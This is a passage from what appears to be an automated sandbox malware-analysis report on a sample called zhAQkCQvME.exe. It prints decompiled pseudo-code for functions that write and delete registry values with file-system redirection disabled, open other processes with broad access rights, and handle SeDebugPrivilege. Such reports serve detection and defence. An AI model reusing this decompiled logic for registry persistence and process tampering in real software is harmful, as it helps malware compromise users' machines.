						_v12 = _v12 + 1;
					}
					_v8 = _a4[0x26f] & 0x80000000 |  *_a4 & 0x7fffffff;
					_a4[0x26f] = _v8 >> 0x00000001 ^ _a4[0x18c] ^  *(0x41f2ac + (_v8 & 0x00000001) * 4);
					_a4[0x270] = 0;
				}
				_t71 =  &(_a4[0x270]); // 0x74000041
				_v8 = _a4[ *_t71];
				_t77 =  &(_a4[0x270]); // 0x74000041
				_a4[0x270] =  *_t77 + 1;
				_v8 = _v8 >> 0x0000000b ^ _v8;
				_v8 = _v8 << 0x00000007 & 0x9d2c5680 ^ _v8;
				_v8 = _v8 << 0x0000000f & 0xefc60000 ^ _v8;
				_v8 = _v8 >> 0x00000012 ^ _v8;
				return _v8;
			}

0x004088c3
0x004088c9
0x004088db
0x00408905
0x0040892d
0x004088d8
0x004088d8
0x0040893d
0x00408966
0x0040898e
0x0040893a
0x0040893a
0x004089ae
0x004089cf
0x004089d8
0x004089d8
0x004089e5
0x004089f1
0x004089f7
0x00408a03
0x00408a12
0x00408a23
0x00408a35
0x00408a41
0x00408a4a

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9330aa016b7cbedeaf6550ece094d78bdcf6cb1965b52d89ab108fa09fe8b90
Instruction ID: 8a64b2ca5420ddd6b426f9d8b37d763df2d5d3451135f5408f14e132ea7a4336
Opcode Fuzzy Hash: d9330aa016b7cbedeaf6550ece094d78bdcf6cb1965b52d89ab108fa09fe8b90
Instruction Fuzzy Hash: 5451ED74A01208EFDB04CF58C591AADBBB2FF88354F2482A9D8499B385C735AF51DF84

Uniqueness

Uniqueness Score: 0.00%

Function 0040E230, Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 290
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0040E230(void* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				WCHAR* _v32;
				int _v36;
				CHAR* _v40;
				_Unknown_base(*)()* _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				char _v180;
				char _v184;
				char _v188;
				signed int _t102;
				CHAR* _t118;
				int _t124;
				int _t126;
				int _t127;
				int _t128;
				int _t133;
				signed int _t135;
				void* _t143;
				int _t158;
				int _t159;
				int _t161;
				void* _t215;
				void* _t217;
				void* _t221;
				void* _t222;

				_v12 = _a4;
				if(_a4 != 0x80000002) {
					L35:
					_t102 = RegOpenKeyExW(_a4, _a8, 0, 2,  &_v8);
					_v16 = _t102;
					if(_v16 == 0) {
						if(_a20 == 0) {
							_v16 = RegDeleteValueW(_v8, _a12);
							if(_v16 == 0) {
								while(0 != 0) {
								}
								L53:
								RegCloseKey(_v8);
								return 0;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v8);
							return 0xfffffffd;
						}
						_v16 = RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24);
						if(_v16 == 0) {
							while(0 != 0) {
							}
							goto L53;
						}
						while(0 != 0) {
						}
						RegCloseKey(_v8);
						return 0xfffffffe;
					}
					while(0 != 0) {
					}
					return _t102 | 0xffffffff;
				}
				_t169 =  *0x41f7fc & 0x0000ffff;
				if(( *0x41f7fc & 0x0000ffff) != 9 ||  *0x42150c == 0) {
					goto L35;
				} else {
					_v20 = 0;
					_v36 = 0;
					_v32 = E00407F40(_t169, 0x2bed);
					_t118 = E00408060(_t169, 0x925);
					_t217 = _t215 + 8;
					_v40 = _t118;
					_v24 = 0;
					if(_a20 == 0) {
						L34:
						E00403F10( &_v36, 0xfffffffe);
						E00408170( &_v32);
						E00408170( &_v40);
						return _v24;
					}
					if(_a16 != 4) {
						if(_a16 != 1) {
							while(0 != 0) {
							}
							_v24 = 0xfffffffc;
							goto L34;
						}
						_t124 = lstrlenW("C:\Windows");
						_t126 = lstrlenW(_v32);
						_t172 = _a8;
						_t127 = lstrlenW(_a8);
						_t128 = lstrlenW(_a12);
						_v28 = _t124 + _t126 + 1 + _t127 + _t128 + lstrlenW( &(_a20[0x28]));
						goto L11;
					} else {
						_t158 = lstrlenW("C:\Windows");
						_t159 = lstrlenW(_v32);
						_t161 = lstrlenW(_a8);
						_t172 = _a12;
						_v28 = _t158 + _t159 + 1 + _t161 + lstrlenW(_a12) + 0x28;
						L11:
						_t133 = E00403EE0(_t172, _v28 + _v28 + 2);
						_t217 = _t217 + 4;
						_v36 = _t133;
						if(_v36 != 0) {
							_t135 = E00403B30(_v36, _v28, L"%s\\system32\\", "C:\Windows");
							_t217 = _t217 + 0x10;
							_v48 = _t135;
							if(_v48 >= 0) {
								if(_a16 != 4) {
									_push(_a20);
									_push(_a12);
									_push(L"REG_SZ");
									E00403B30(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x1c;
								} else {
									E00403B30( &_v180, 0x40, 0x41881c,  *_a20);
									_push( &_v180);
									_push(_a12);
									_push(L"REG_DWORD");
									E00403B30(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x2c;
								}
								while(0 != 0) {
								}
								_v52 = GetProcAddress(GetModuleHandleA(_v40), "Wow64DisableWow64FsRedirection");
								E00408170( &_v40);
								_t222 = _t221 + 4;
								if(_v52 != 0) {
									_v52( &_v184);
									_t222 = _t222 + 4;
								}
								_t143 = E004041B0( &_v20, _v36,  &_v20, 0x1388, 1);
								_t217 = _t222 + 0x10;
								if(_t143 != 0) {
									while(0 != 0) {
									}
									goto L32;
								} else {
									while(0 != 0) {
									}
									_v24 = 0xfffffff9;
									L32:
									_v44 = GetProcAddress(GetModuleHandleA(_v40), "Wow64EnableWow64FsRedirection");
									if(_v44 != 0) {
										_v44( &_v188);
										_t217 = _t217 + 4;
									}
									goto L34;
								}
							}
							while(0 != 0) {
							}
							_v24 = 0xfffffffa;
							goto L34;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffb;
						goto L34;
					}
				}
			}

0x0040e23d
0x0040e247
0x0040e4f3
0x0040e503
0x0040e509
0x0040e510
0x0040e524
0x0040e578
0x0040e57f
0x0040e598
0x0040e59c
0x0040e59e
0x0040e5a2
0x00000000
0x0040e5a8
0x0040e581
0x0040e585
0x0040e58b
0x00000000
0x0040e591
0x0040e542
0x0040e549
0x0040e562
0x0040e566
0x00000000
0x0040e568
0x0040e54b
0x0040e54f
0x0040e555
0x00000000
0x0040e55b
0x0040e512
0x0040e516
0x00000000
0x0040e518
0x0040e24d
0x0040e257
0x00000000
0x0040e26a
0x0040e26a
0x0040e271
0x0040e285
0x0040e28d
0x0040e292
0x0040e295
0x0040e298
0x0040e2a3
0x0040e4c5
0x0040e4cb
0x0040e4d7
0x0040e4e3
0x00000000
0x0040e4eb
0x0040e2ad
0x0040e2ed
0x0040e336
0x0040e33a
0x0040e33c
0x00000000
0x0040e33c
0x0040e2f4
0x0040e300
0x0040e30a
0x0040e30e
0x0040e31a
0x0040e331
0x00000000
0x0040e2af
0x0040e2b4
0x0040e2c0
0x0040e2ce
0x0040e2d6
0x0040e2e4
0x0040e348
0x0040e350
0x0040e355
0x0040e358
0x0040e35f
0x0040e385
0x0040e38a
0x0040e38d
0x0040e394
0x0040e3ac
0x0040e400
0x0040e404
0x0040e405
0x0040e423
0x0040e428
0x0040e3ae
0x0040e3c2
0x0040e3d0
0x0040e3d4
0x0040e3d5
0x0040e3f3
0x0040e3f8
0x0040e3f8
0x0040e42b
0x0040e42f
0x0040e447
0x0040e44e
0x0040e453
0x0040e45a
0x0040e463
0x0040e466
0x0040e466
0x0040e478
0x0040e47d
0x0040e482
0x0040e493
0x0040e497
0x00000000
0x0040e484
0x0040e484
0x0040e488
0x0040e48a
0x0040e499
0x0040e4af
0x0040e4b6
0x0040e4bf
0x0040e4c2
0x0040e4c2
0x00000000
0x0040e4b6
0x0040e482
0x0040e396
0x0040e39a
0x0040e39c
0x00000000
0x0040e39c
0x0040e361
0x0040e365
0x0040e367
0x00000000
0x0040e367
0x0040e2ad

APIs

lstrlenW.KERNEL32(C:\Windows), ref: 0040E2B4
lstrlenW.KERNEL32(?), ref: 0040E2C0
lstrlenW.KERNEL32(?), ref: 0040E2CE
lstrlenW.KERNEL32(?), ref: 0040E2DA

Part of subcall function 00403B30: wvnsprintfW.SHLWAPI(-00001434,?,?,?), ref: 00403B5E
Part of subcall function 00403B30: lstrlenW.KERNEL32(00000000), ref: 00403B85

lstrlenW.KERNEL32(C:\Windows), ref: 0040E2F4
lstrlenW.KERNEL32(?), ref: 0040E300
lstrlenW.KERNEL32(?), ref: 0040E30E
lstrlenW.KERNEL32(?), ref: 0040E31A
lstrlenW.KERNEL32(?), ref: 0040E329
GetModuleHandleA.KERNEL32(?,Wow64DisableWow64FsRedirection), ref: 0040E43A
GetProcAddress.KERNEL32(00000000), ref: 0040E441
GetModuleHandleA.KERNEL32(?,Wow64EnableWow64FsRedirection), ref: 0040E4A2
GetProcAddress.KERNEL32(00000000), ref: 0040E4A9
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000002,?), ref: 0040E503
RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040E53C
RegCloseKey.ADVAPI32(?), ref: 0040E555
RegDeleteValueW.ADVAPI32(?,?), ref: 0040E572
RegCloseKey.ADVAPI32(?), ref: 0040E58B
RegCloseKey.ADVAPI32(?), ref: 0040E5A2

Strings

REG_DWORD, xrefs: 0040E3D5
Wow64EnableWow64FsRedirection, xrefs: 0040E499
%s\system32\, xrefs: 0040E378
C:\Windows, xrefs: 0040E2AF, 0040E2EF, 0040E373
REG_SZ, xrefs: 0040E405
Wow64DisableWow64FsRedirection, xrefs: 0040E431

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$Close$AddressHandleModuleProcValue$DeleteOpenwvnsprintf
String ID: %s\system32\$C:\Windows$REG_DWORD$REG_SZ$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection
API String ID: 2270979939-567110100
Opcode ID: 7df07cef5038f494bc7eca1c02b79404e59419d3d9da09aaee0b19646f55652a
Instruction ID: 8c6625c318ee49ee1b3a7dbb522c18fbc38d568a9ac616ec8ae8bc2912741bfb
Opcode Fuzzy Hash: 7df07cef5038f494bc7eca1c02b79404e59419d3d9da09aaee0b19646f55652a
Instruction Fuzzy Hash: 99B19171900209EBCB10DFE5DC49AEF7BB4AB48304F14897AF916B72C1D7389951CB99

Uniqueness

Uniqueness Score: 3.53%

Function 00402270, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 151
windowregistrysynchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 43%

			E00402270() {
				struct _WNDCLASSEXA _v52;
				struct tagMSG _v80;
				int _v84;
				struct HWND__* _v88;
				long _v92;
				struct HWND__* _v96;
				void* _t38;
				signed int _t40;
				signed int _t41;
				signed int _t55;
				struct HWND__* _t57;
				struct HWND__* _t61;

				_v88 = 0;
				_v92 = 0;
				while(0 != 0) {
				}
				E00404120( &_v52,  &_v52, 0, 0x30);
				_v52.lpszClassName = 0x41f804;
				_v52.cbWndExtra = 0;
				_v52.style = 3;
				_v52.lpszMenuName = 0;
				_v52.cbSize = 0x30;
				_v52.lpfnWndProc = E00402470;
				_v52.cbClsExtra = 0;
				_v52.hInstance =  *0x41f6c4;
				if((RegisterClassExA( &_v52) & 0x0000ffff) != 0) {
					 *0x41f6c8 = CreateWindowExA(0, "zhAQkCQvME", "zhAQkCQvME", 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0,  *0x41f6c4, 0);
					if( *0x41f6c8 != 0) {
						E004021B0();
						_t61 =  *0x41f6c8; // 0x0
						ShowWindow(_t61, 0);
						UpdateWindow( *0x41f6c8);
						while(0 != 0) {
						}
						while(1) {
							_v84 = GetMessageA( &_v80, 0, 0, 0);
							if(_v84 == 0) {
								break;
							}
							if(_v84 != 0xffffffff) {
								TranslateMessage( &_v80);
								DispatchMessageA( &_v80);
							} else {
								while(0 != 0) {
								}
							}
						}
						while(0 != 0) {
						}
					} else {
						while(0 != 0) {
						}
					}
				} else {
					while(0 != 0) {
					}
				}
				if( *0x41f6c8 != 0) {
					_t57 =  *0x41f6c8; // 0x0
					DestroyWindow(_t57);
				}
				UnregisterClassA("zhAQkCQvME",  *0x41f6c4);
				_t38 =  *0x41f6bc; // 0x0
				_v92 = WaitForSingleObject(_t38, 0x7530);
				_t54 = _v92;
				_v96 = _v92;
				if(_v96 == 0) {
					while(1) {
						_t54 = 0;
						if(0 == 0) {
							break;
						}
					}
				} else {
					if(_v96 == 0x102) {
						while(0 != 0) {
						}
					} else {
						if(_v96 == 0xffffffff) {
							while(0 != 0) {
							}
						} else {
							while(0 != 0) {
							}
						}
					}
				}
				_t40 =  *0x41f6d0; // 0x0
				_t41 = _t40 & 0x00000002;
				if(_t41 != 0) {
					E00408C10(1);
					E00408C10(0);
					return E004041B0(_t54, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0, 0x1388, 1);
				}
				_t55 =  *0x41f6d0; // 0x0
				_t56 = _t55 & 0x00000004;
				if((_t55 & 0x00000004) != 0) {
					return E00403900(_t56);
				}
				return _t41;
			}

0x00402276
0x0040227d
0x00402284
0x00402288
0x00402292
0x0040229a
0x004022a1
0x004022a8
0x004022af
0x004022b6
0x004022bd
0x004022c4
0x004022d1
0x004022e3
0x00402324
0x00402330
0x0040233a
0x00402341
0x00402348
0x00402354
0x0040235a
0x0040235e
0x00402360
0x00402370
0x00402377
0x00000000
0x00000000
0x0040237d
0x0040238b
0x00402395
0x0040237f
0x0040237f
0x00402383
0x00402385
0x0040239b
0x0040239d
0x004023a1
0x00402332
0x00402332
0x00402336
0x00402338
0x004022e5
0x004022e5
0x004022e9
0x004022eb
0x004023aa
0x004023ac
0x004023b3
0x004023b3
0x004023c5
0x004023d0
0x004023dc
0x004023df
0x004023e2
0x004023e9
0x0040240c
0x0040240c
0x0040240e
0x00000000
0x00000000
0x00402410
0x004023eb
0x004023f2
0x00402404
0x00402408
0x004023f4
0x004023f8
0x004023fc
0x00402400
0x004023fa
0x00402414
0x00402418
0x00402414
0x004023f8
0x004023f2
0x0040241a
0x0040241f
0x00402422
0x00402426
0x00402430
0x00000000
0x0040244b
0x00402450
0x00402456
0x00402459
0x00000000
0x0040245b
0x00402463

APIs

RegisterClassExA.USER32(00000030), ref: 004022D8
CreateWindowExA.USER32(00000000,zhAQkCQvME,zhAQkCQvME,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00400000,00000000), ref: 0040231E
ShowWindow.USER32(00000000,00000000), ref: 00402348
UpdateWindow.USER32(00000000), ref: 00402354
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040236A
TranslateMessage.USER32(?), ref: 0040238B
DispatchMessageA.USER32(?), ref: 00402395
DestroyWindow.USER32(00000000), ref: 004023B3
UnregisterClassA.USER32(zhAQkCQvME,00400000), ref: 004023C5
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 004023D6

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 00402441
zhAQkCQvME, xrefs: 0040229A, 00402312, 00402317, 004023C0
0, xrefs: 004022B6

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Window$Message$Class$CreateDestroyDispatchObjectRegisterShowSingleTranslateUnregisterUpdateWait
String ID: 0$C:\Users\user\Desktop\zhAQkCQvME.exe$zhAQkCQvME
API String ID: 2867772559-46610180
Opcode ID: b9be093a5d9b535e31dcc1d825ab7d69353991ca021778f0e8b215ed2a4090d0
Instruction ID: 61eef142853e2e963bb31f4806811e7e2d12393fc59d91ccad8168631e2f6200
Opcode Fuzzy Hash: b9be093a5d9b535e31dcc1d825ab7d69353991ca021778f0e8b215ed2a4090d0
Instruction Fuzzy Hash: E6519D74A40214EBDB249BA0DE4EBAA7770B754704F24813BEA127A2E0D7FC4447DB5E

Uniqueness

Uniqueness Score: 100.00%

Function 00401950, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 299
UNIQUE

Download Yara Rule

C-Code - Quality: 80%

			E00401950(void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				void** _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				WCHAR* _v32;
				char _v72;
				void* _v76;
				long _v80;
				char _v148;
				int _v152;
				char _v220;
				long _t88;
				WCHAR* _t90;
				signed int _t99;
				signed int _t100;
				int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t127;
				signed int _t135;
				void** _t138;
				int _t140;
				WCHAR* _t146;
				int _t147;
				signed int _t152;
				intOrPtr _t156;
				void** _t175;
				intOrPtr _t207;
				signed int _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t229;

				_t229 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = _a8;
				_v8 = 0;
				if( *0x41f6d0 == 0) {
					_t88 = GetCurrentProcessId();
					_t156 = _a4;
					__eflags =  *((intOrPtr*)(_t156 + 8)) - _t88;
					if( *((intOrPtr*)(_t156 + 8)) != _t88) {
						_v24 = 0;
						while(1) {
							__eflags = _v24 -  *0x41f6b8; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t207 =  *0x41f6c0; // 0x0
							_t152 = E004049E0(_a4 + 0x24,  *((intOrPtr*)(_t207 + _v24 * 4)));
							_t210 = _t210 + 8;
							__eflags = _t152;
							if(_t152 == 0) {
								_t209 = _v24 + 1;
								__eflags = _t209;
								_v24 = _t209;
								continue;
							}
							return 1;
						}
						_t90 = E00404AE0(_a4 + 0x24);
						_t211 = _t210 + 4;
						_v32 = _t90;
						__eflags = _v32;
						if(_v32 == 0) {
							L15:
							E00406FE0( &_v72, E004046E0(_a4 + 0x24, 0x5c),  *(_a4 + 8));
							_t213 = _t211 + 0x14;
							_v76 = OpenEventA(2, 0,  &_v72);
							__eflags = _v76;
							if(_v76 == 0) {
								_v80 = GetLastError();
								__eflags = _v80 - 2;
								if(_v80 == 2) {
									_v20 = OpenProcess(0x43a, 0,  *(_a4 + 8));
									__eflags = _v20;
									if(_v20 != 0) {
										__eflags = _v28;
										if(_v28 != 0) {
											L26:
											_t160 =  *(_a4 + 8);
											_t99 = E004010A0( *(_a4 + 8),  *(_a4 + 8), _a4 + 0x24);
											_t214 = _t213 + 8;
											__eflags = _t99;
											if(_t99 == 0) {
												_t100 =  *0x421408; // 0x0
												__eflags = _t100 & 0x00000002;
												if(__eflags == 0) {
													L35:
													_v152 = 0;
													E00408190(__eflags, 1,  &_v148);
													 *((intOrPtr*)(_v12 + 0x10)) = E00408210( &_v148, _v12 + 0x14);
													E00408190(__eflags, 2,  &_v220);
													 *((intOrPtr*)(_v12 + 0x18)) = E00408210( &_v220, _v12 + 0x1c);
													_t109 = E00407F40( &_v220, 0x74f);
													_t219 = _t214 + 0x24;
													_v152 = _t109;
													__eflags = _v152;
													if(_v152 != 0) {
														__eflags = _v12 + 0x24;
														 *(_v12 + 0x20) = E00408210(_v152, _v12 + 0x24);
														E00408170( &_v152);
														_t219 = _t219 + 0xc;
													}
													_t110 = E004045D0(_v20);
													_t220 = _t219 + 4;
													__eflags = _t110;
													if(__eflags == 0) {
														_t112 = E004069A0(__eflags, _t229, _v20, _v12);
														_t221 = _t220 + 8;
														__eflags = _t112;
														if(_t112 == 0) {
															goto L47;
														} else {
															goto L44;
														}
														while(1) {
															L44:
															__eflags = 0;
															if(0 == 0) {
																break;
															}
														}
														__eflags = _a4 + 0x24;
														E00401000( *(_a4 + 8), _a4 + 0x24);
														_t221 = _t221 + 8;
														goto L47;
													} else {
														_t127 = E00406AB0(__eflags, _t229, _v20, _v12);
														_t221 = _t220 + 8;
														__eflags = _t127;
														if(_t127 == 0) {
															L42:
															L47:
															E00403F10(_v12 + 0x10,  *((intOrPtr*)(_v12 + 0x14)));
															E00403F10(_v12 + 0x18,  *((intOrPtr*)(_v12 + 0x1c)));
															_t160 = _v12 + 0x20;
															__eflags = _v12 + 0x20;
															E00403F10(_v12 + 0x20,  *(_v12 + 0x24));
															_t214 = _t221 + 0x18;
															L48:
															E00403F10( &_v16, 0);
															__eflags = _v20;
															if(_v20 != 0) {
																CloseHandle(_v20);
															}
															__eflags = _v28;
															if(_v28 != 0) {
																E00407340(_t160, "SeDebugPrivilege", 0);
															}
															Sleep(1);
															return 1;
														} else {
															goto L39;
														}
														while(1) {
															L39:
															__eflags = 0;
															if(0 == 0) {
																break;
															}
														}
														__eflags = _a4 + 0x24;
														E00401000( *(_a4 + 8), _a4 + 0x24);
														_t221 = _t221 + 8;
														goto L42;
													}
												}
												_t160 =  *0x4217cc; // 0x15d07b7
												_t135 = E004049E0(_a4 + 0x24, _t160);
												_t214 = _t214 + 8;
												__eflags = _t135;
												if(__eflags == 0) {
													goto L35;
												} else {
													goto L32;
												}
												while(1) {
													L32:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												goto L48;
											} else {
												goto L27;
											}
											while(1) {
												L27:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											goto L48;
										}
										_t138 = E004074B0(_v20);
										_t213 = _t213 + 4;
										_v16 = _t138;
										__eflags = _v16;
										if(_v16 != 0) {
											_t175 =  *0x41f864; // 0x164f7d0
											_t160 =  *_v16;
											_t140 = EqualSid( *_v16,  *_t175);
											__eflags = _t140;
											if(_t140 != 0) {
												goto L26;
											}
											goto L48;
										}
										goto L48;
									}
									return 1;
								}
								return 1;
							}
							CloseHandle(_v76);
							return 1;
						}
						_t146 =  *0x41fd7c; // 0x41fb9c
						_t147 = lstrcmpiW(_v32, _t146);
						__eflags = _t147;
						if(_t147 != 0) {
							goto L15;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E00403F10( &_v32, 0xfffffffe);
						return 1;
					}
					return 1;
				}
				return 0;
			}

0x00401950
0x00401959
0x00401960
0x00401967
0x00401971
0x00401974
0x00401982
0x0040198b
0x00401991
0x00401994
0x00401997
0x004019a3
0x004019b5
0x004019b8
0x004019be
0x00000000
0x00000000
0x004019c3
0x004019d4
0x004019d9
0x004019dc
0x004019de
0x004019af
0x004019af
0x004019b2
0x00000000
0x004019b2
0x00000000
0x004019e0
0x004019f3
0x004019f8
0x004019fb
0x004019fe
0x00401a02
0x00401a36
0x00401a53
0x00401a58
0x00401a69
0x00401a6c
0x00401a70
0x00401a8e
0x00401a91
0x00401a95
0x00401ab5
0x00401ab8
0x00401abc
0x00401ac8
0x00401acc
0x00401b06
0x00401b10
0x00401b14
0x00401b19
0x00401b1c
0x00401b1e
0x00401b2b
0x00401b30
0x00401b33
0x00401b5a
0x00401b5a
0x00401b6d
0x00401b8e
0x00401b9a
0x00401bbb
0x00401bc3
0x00401bc8
0x00401bcb
0x00401bd1
0x00401bd8
0x00401bdd
0x00401bf3
0x00401bfd
0x00401c02
0x00401c02
0x00401c09
0x00401c0e
0x00401c11
0x00401c13
0x00401c4f
0x00401c54
0x00401c57
0x00401c59
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c5b
0x00401c5b
0x00401c5b
0x00401c5d
0x00000000
0x00000000
0x00401c5f
0x00401c64
0x00401c6f
0x00401c74
0x00000000
0x00401c15
0x00401c1d
0x00401c22
0x00401c25
0x00401c27
0x00401c45
0x00401c77
0x00401c85
0x00401c9b
0x00401cad
0x00401cad
0x00401cb1
0x00401cb6
0x00401cb9
0x00401cbf
0x00401cc7
0x00401ccb
0x00401cd1
0x00401cd1
0x00401cd7
0x00401cdb
0x00401ce4
0x00401ce9
0x00401cee
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c29
0x00401c29
0x00401c29
0x00401c2b
0x00000000
0x00000000
0x00401c2d
0x00401c32
0x00401c3d
0x00401c42
0x00000000
0x00401c42
0x00401c13
0x00401b35
0x00401b43
0x00401b48
0x00401b4b
0x00401b4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b4f
0x00401b4f
0x00401b4f
0x00401b51
0x00000000
0x00000000
0x00401b53
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b20
0x00401b20
0x00401b20
0x00401b22
0x00000000
0x00000000
0x00401b24
0x00000000
0x00401b26
0x00401ad2
0x00401ad7
0x00401ada
0x00401add
0x00401ae1
0x00401ae8
0x00401af4
0x00401af7
0x00401afd
0x00401aff
0x00000000
0x00000000
0x00000000
0x00401b01
0x00000000
0x00401ae3
0x00000000
0x00401abe
0x00000000
0x00401a97
0x00401a76
0x00000000
0x00401a7c
0x00401a04
0x00401a0e
0x00401a14
0x00401a16
0x00000000
0x00000000
0x00000000
0x00000000
0x00401a18
0x00401a18
0x00401a18
0x00401a1a
0x00000000
0x00000000
0x00401a1c
0x00401a24
0x00000000
0x00401a2c
0x00000000
0x00401999
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040198B

Strings

SeDebugPrivilege, xrefs: 00401CDF

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentProcess
String ID: SeDebugPrivilege
API String ID: 2050909247-2896544425
Opcode ID: 6d2a6a6d619d6b06abbb1a4788795554723cc6a56d37cafae7e6bf79a3b3d4d8
Instruction ID: 0df5d9c60ccb14b59428920b2f1c5aeab8871de807be639211a806361b5eba7a
Opcode Fuzzy Hash: 6d2a6a6d619d6b06abbb1a4788795554723cc6a56d37cafae7e6bf79a3b3d4d8
Instruction Fuzzy Hash: 2EB1B4B4E042049BDB10DBA5DC45BAE7774AF44309F14813AE50AB73D2E739EA81CB99

Uniqueness

Uniqueness Score: 100.00%

Function 0040E7F0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212
stringregistryUNIQUE

Download Yara Rule

C-Code - Quality: 35%

			E0040E7F0(void* __ecx, void* __fp0, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				short* _v8;
				signed int _v12;
				char _v16;
				char _v540;
				intOrPtr _v544;
				char _v548;
				signed int _v552;
				short* _v556;
				char _v560;
				char _v692;
				char _v756;
				char _v760;
				char _v1284;
				char _t57;
				signed int _t81;
				signed int _t85;
				short* _t86;
				long _t88;
				signed int _t90;
				long _t92;
				signed int _t99;
				CHAR* _t103;
				void* _t126;
				void* _t127;
				void* _t130;
				void* _t131;
				void* _t138;
				void* _t139;
				void* _t141;

				_t141 = __fp0;
				_v552 = 0;
				_v12 = 0;
				_v8 = 0;
				_v548 = 0;
				_v560 = 0;
				_v16 = 0;
				_v556 = 0;
				_v544 = 0x104;
				_t57 = E0040C710(__ecx, _a8, 0);
				_t127 = _t126 + 8;
				_v16 = _t57;
				if(_v16 != 0) {
					_push( &_v8);
					_push(_a4);
					L0041042E();
					_v560 = E00407F40( &_v8, 0x15a4);
					_push(0);
					_push(_v560);
					_push(0x4187f0);
					_push(_v8);
					_push(0x4187f0);
					_v548 = E00404CB0(_v8);
					E00408170( &_v560);
					_t130 = _t127 + 0x20;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E004101E0(_a4,  &_v540, 0x208);
					_t131 = _t130 + 0xc;
					_t99 =  *0x421408; // 0x0
					_t100 = _t99 & 0x00000001;
					__eflags = _t99 & 0x00000001;
					if((_t99 & 0x00000001) != 0) {
						_v552 = 0xffffffff;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						L24:
						__eflags = _v552;
						if(_v552 >= 0) {
							L36:
							E00403F10( &_v548, 0xffffffff);
							E00403F10( &_v16, 0xffffffff);
							LocalFree(_v8);
							__eflags = 0;
							return 0;
						}
						_v760 = 0;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpyA( &_v756, _a12);
						_t103 =  *0x4217f8; // 0x15d081d
						lstrcatA( &_v756, _t103);
						E00404BD0( &_v756,  &_v756,  &_v692, 0x40);
